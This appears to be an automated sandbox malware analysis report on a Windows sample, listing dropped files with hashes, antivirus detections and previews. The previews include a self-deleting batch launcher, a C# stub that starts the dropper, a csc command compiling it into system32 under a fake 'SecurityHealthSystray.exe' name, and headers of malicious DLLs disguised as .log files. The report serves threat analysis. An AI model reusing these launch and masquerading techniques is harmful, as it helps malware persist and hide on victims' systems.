                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\a8Wfdv1Bxc

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.403856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:OJ8e:OGe
                                                  MD5:36746C915B9709EA314C9551BB9357A5
                                                  SHA1:16442803F613F91C31E4C2D752B91F4703525A64
                                                  SHA-256:1311C475A5697ACC94F5E6F741580C5404F4A69C372D700DF99D26E9BAB27D08
                                                  SHA-512:3EA57116204C23944AD551E3E11F8A1F900C1D966FD5B42BCC15A990557457DFB3E18C542FBD654A61A94B540F61723AB4F0AE5B97FDD34BC2774CB5C367D2D0
                                                  Malicious:false
                                                  Preview:ndMBsczZWEmRyFze9EGNIoMA2

                                                  C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):199
                                                  Entropy (8bit):5.0733514334481935
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DE7EXsKOZG1wkn23fIVhn:HTg9uYDE7EXWfQDn
                                                  MD5:7EF01AA019ACEA7DFC73F2373A5D73AF
                                                  SHA1:9E1DD96689AFEEEE13B0205DC2C974875D554989
                                                  SHA-256:24CFCC612013B809D985512EDB923FAA515DE5D4752D7EC16EA7459D2D5622C7
                                                  SHA-512:E132B0DE97CE35521F3F3D205ADAB21C5F4928035872DAC8D39CBE0ABF74C1FE6959B6057CCCA1E531A5FC7AFB2400A3D13C334FA5504FB95E301EAB1E22E1BB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\dllhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fCpmFQ1klK.bat"

                                                  C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.0.cs

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                  Category:dropped
                                                  Size (bytes):370
                                                  Entropy (8bit):4.871284232272529
                                                  Encrypted:false
                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JEXriFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKa
                                                  MD5:EF5726A6103652B2DDDC7CDD44B195E6
                                                  SHA1:D26176BAE31D5E297923D7A007A0D5BF6A3455C2
                                                  SHA-256:BAAFACA64C25F6C6D88063B4E9C01BB4298414B1DDEFD68AE8AB394C4AB3304A
                                                  SHA-512:FC0653A92211761AFA6F5F060FC101499291174185B966833EC4197194B92A865787E5E1E12D0218A9A20A43DF58CE3E88A69E85A25749B693BB5AEA28D58324
                                                  Malicious:false
                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\dllhost.exe"); } catch { } }).Start();. }.}.

                                                  C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.cmdline

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):250
                                                  Entropy (8bit):5.1264845457009205
                                                  Encrypted:false
                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fNVn9n:Hu7L//TRq79cQWfFVn9
                                                  MD5:83AF4C45DA447EA79ED47ABF7514250E
                                                  SHA1:810D2E8B68FDFB51F791F3C1BBD6EF58ADB010FB
                                                  SHA-256:A93B817D4D6B1D86D4D0AFDE03313C540B25C4F736FA5ADCA46787D7EFB8010E
                                                  SHA-512:E0B0F01499CFFAB9402837A4B2A278D1D7AFA5280358D75863314C16B6BE18F5EE1ECCFE68D120A3D605EA27B33A4A8449A1DCC92709B63FCE4FC3CFCAFF608C
                                                  Malicious:true
                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.0.cs"

                                                  C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.out

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):750
                                                  Entropy (8bit):5.270707350569988
                                                  Encrypted:false
                                                  SSDEEP:12:KJN/I/u7L//TRq79cQWfFVn4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfFCKax5DqBVKVrdFAw
                                                  MD5:99FA4910CB0FD28D64D371812771D53C
                                                  SHA1:1211E8E18AC30EFF2A83E44F153212FF85E5C470
                                                  SHA-256:908DDBA1324FB0804EDE1249D4E51939B0117D26F0B2EB8DB3A1A8F00576BEBC
                                                  SHA-512:B73AC2DF779E0D2CE46CEFB9192FFA6A958B786EF141C437D15CC85194D9DF06781B50F09279C5E46FF03C6E37C2DB911DFFF443275F4327C72309DE914551AE
                                                  Malicious:false
                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2ckjc1r\j2ckjc1r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                  C:\Users\user\Desktop\CcvWVetw.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                  Joe Sandbox View:
                                                  • Filename: h6t9F6kG2d.exe, Detection: malicious, Browse
                                                  • Filename: 4e9460942b0ebe09cd130b4154587ec6f5f14bbad4b23.exe, Detection: malicious, Browse
                                                  • Filename: LisectAVT_2403002A_263.exe, Detection: malicious, Browse
                                                  • Filename: U0KN4fzlG7.exe, Detection: malicious, Browse
                                                  • Filename: pGQ1F8RaiV.exe, Detection: malicious, Browse
                                                  • Filename: yM80f3LuOQ.exe, Detection: malicious, Browse
                                                  • Filename: l0OB73W8ax.exe, Detection: malicious, Browse
                                                  • Filename: 475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe, Detection: malicious, Browse
                                                  • Filename: AK4VPeDc0M.exe, Detection: malicious, Browse
                                                  • Filename: a6zbacl43h.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\CkfpANUC.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\MQZNFpoe.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 22%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\UZVKerGo.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WkrLeKmp.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.492504448438552
                                                  Encrypted:false
                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\dd532e64811097

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.243856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:xI43SW5n:t3hn
                                                  MD5:728DDB345602EA2B8AB3FC782C5C74BF
                                                  SHA1:03DD6C7DB953D3DB205554518481EEED780AE58E
                                                  SHA-256:58DEA24030D1726EF6DCE7BC4BDFFF1D29D324742D39BA5ABFAD25FE4B3777F3
                                                  SHA-512:3ECF23A560DC4E243E2DCE67543F29257DF105D17728AD190CEC50DCB0E40D15EB5143BAD2AF49E13CAD5EBA966375497C4C32814FB349D063BAAAFE0A92F017
                                                  Malicious:false
                                                  Preview:lygmcbWwVBSWjjQNuffnSldZ9

                                                  C:\Users\user\Desktop\gSKbOmrW.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\lVerBrOi.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\pfMyjKNB.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\tznhlkeP.log

                                                  Download File
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.492504448438552
                                                  Encrypted:false
                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\yfmgiIMl.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 22%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Windows\GameBarPresenceWriter\4821a341fd9e2f

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (391), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):391
                                                  Entropy (8bit):5.843671783476856
                                                  Encrypted:false
                                                  SSDEEP:12:qwBV3kHpKY8YbuMlLSUCnrgUv7OGKGVc3/hHvpLJ:q6V3UpeYuMF6gUjOgMZHn
                                                  MD5:85BD59116005CEB0B93E1AC9000B7A1B
                                                  SHA1:226CA798921F3F4D57FA4A88774AF35512A3FA15
                                                  SHA-256:2061DA69D32BA2B0D1FC8E00179FC1C765894A59E6B91D22634B5B5C74149E2B
                                                  SHA-512:66B6C4169BE465AD4BAB06632D1C7480C24B8929098B8F091E2B4A6E90EE24EF56212695FE414A084EF6A7764306BF6630D92AFDD024D616988789ACC168DB95
                                                  Malicious:false
                                                  Preview:wCqoEr2I5sAVHnWMcW0NnmjDSXjYSpnTnBNCiQVx4gyQfmsiu9fSaluJcmVrIezPFqrFZUoLADSGyThpoAoSJU2BQDj54noariLz5mIZUTRXTnUJFpCIzgGuxpyWutRXY1ZQHsuB1O80Dfsnta0OkglKcbBQxwplC48bODCW5BQkiQrS6LmU3Cw2QOyqreNEjXxIhRYpXdTjQAmMutTmKVrAIGKAPVobxLBLciupx66ZsMmQlm67Kl4OpxAbGYaCy2vE8btL8nzNYRR5e4YmZqQMRxfoiTiYf4k0bhRK2u9gwqzYgE7M9ymHlixL5FnoFasdqae6nOuortak7HIdWWZrRcP2uFOxHUbV8VrGkAiuD8a1IMOy6KRsBAMNLlLiA6hWRFl

                                                  C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................................................................0..........(.... ........8........E....)...*.......N...8$...(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....~....{z...9....& ....8y......0..-....... ........8........E....).......j...............8$...8.... ....~....{z...9....& ....8........~....(|...~....(.... ....?g... ....~....{....:....& ....8y...~....9.... ....~....{o...9[...& ....8P......... ........88...r...ps....

                                                  C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  C:\Windows\IdentityCRL\production\4821a341fd9e2f

                                                  Download File
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (574), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):574
                                                  Entropy (8bit):5.88845022074
                                                  Encrypted:false
                                                  SSDEEP:12:vM6ZiIdJm1QlR9szgMlUNhFJkB6NzcZEKCXIadgN:v0IZmzgMlUZKBwoEKwIag
                                                  MD5:B3040E94DB5D3B6220B5B9FDF801712F
                                                  SHA1:11EF8BE8FCAE884CB0C71D24C0C27FAA96499738
                                                  SHA-256:D9354A6AC3160F6B33B4C3E6999FC517176C24AF2BE6CFA702A68B5FE75D951F
                                                  SHA-512:F61EA4D709ED1FB14B4448821343479BC4B64371AB733C18AE6D227FF6BDB59229CC6C0553FDFA06F94383BF1CA2166D9BB2F300FE1E7A68717DA895164F658F
                                                  Malicious:false
